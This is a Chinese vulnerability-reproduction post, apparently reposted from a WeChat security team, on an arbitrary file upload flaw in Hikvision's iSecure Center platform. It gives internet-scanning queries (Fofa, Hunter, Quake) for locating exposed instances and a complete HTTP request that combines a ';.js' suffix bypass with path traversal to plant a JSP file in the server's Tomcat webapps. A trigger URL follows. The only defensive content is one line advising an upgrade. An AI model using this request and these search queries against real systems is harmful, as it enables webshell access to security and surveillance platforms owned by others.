海康威视 综合安防管理平台软件 files;.js 任意文件上传漏洞

admin 2024年6月11日14:06:28评论36 views字数 1255阅读4分11秒阅读模式

产品简介

综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。

漏洞描述

攻击者通过请求 /center/api/files 接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。

网络空间测绘

Fofa

app="HIKVISION-iSecure-Center"

Hunter

web.body="/views/home/file/installPackage.rar"

Quake

body:"/views/home/file/installPackage.rar"
海康威视 综合安防管理平台软件 files;.js 任意文件上传漏洞
image.png

漏洞复现

poc1:

POST /center/api/files;.js HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0
Content-Length: 404
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=e0e1d419983f8f0e95c2d9ccf9b54e488353b5db7bac34b1a973ea9d0f0f
Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Connection: close

--e0e1d419983f8f0e95c2d9ccf9b54e488353b5db7bac34b1a973ea9d0f0f
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/test.jsp"
Content-Type: application/octet-stream

<%out.println("11223344");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--e0e1d419983f8f0e95c2d9ccf9b54e488353b5db7bac34b1a973ea9d0f0f--
海康威视 综合安防管理平台软件 files;.js 任意文件上传漏洞
image.png

访问路径,poc2:

http://127.0.0.1/clusterMgr/test.jsp;.js
海康威视 综合安防管理平台软件 files;.js 任意文件上传漏洞
image.png

修复建议

1、升级产品到最新版本

原文始发于微信公众号(凝聚力安全团队):【漏洞复现】海康威视 综合安防管理平台软件 files;.js 任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月11日14:06:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   海康威视 综合安防管理平台软件 files;.js 任意文件上传漏洞https://cn-sec.com/archives/2837228.html

发表评论

匿名网友 填写信息